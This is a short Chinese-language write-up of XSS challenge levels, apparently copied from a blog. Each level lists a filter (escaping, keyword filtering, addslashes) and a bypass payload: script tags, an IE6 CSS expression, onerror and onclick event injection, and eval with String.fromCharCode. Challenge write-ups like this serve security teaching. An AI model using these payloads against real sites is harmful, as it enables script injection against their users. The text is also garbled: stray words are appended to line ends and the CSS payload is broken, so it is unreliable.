无安全方面的限制,直接使用html
<script>alert(/xss/);</script>express
限制条件:只能使用CSS,不容许使用html标签安全
咱们知道利用expression能够用来构造XSS,可是只能在IE下面测试,因此下面的测试请在IE6中执行。xss
body { black; xss:alert(/xss/));/*IE6下测试*/ }
限制条件:对HTML进行了转义,Image标签可用。ide
测试输入的字符会被插入到src地址中,那么能够使用伪协议来绕过。测试
直接输入spa
alert( /xss/);
或者你也能够使用事件来绕过,注意闭合语句便可,以下:htm
1" onerror=alert(/xss/); var a="1事件
限制条件:使用了关键字过滤。ip
我测试了一下,大部分都过滤了,有部分未过滤,经测试script/onerror过滤了,可是onclick未过滤,使用onclick事件绕过
<img src=# onclick=alert(/xss/);>
限制条件:使用addslashes对特征字符进行了转义
也就是说咱们的XSS语句中不能出现单引号,双引号等等特征字符。
直接使用
<script>alert(/xss/);</script>
便可绕过
或者使用String.fromCharCode方法,以下:
<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>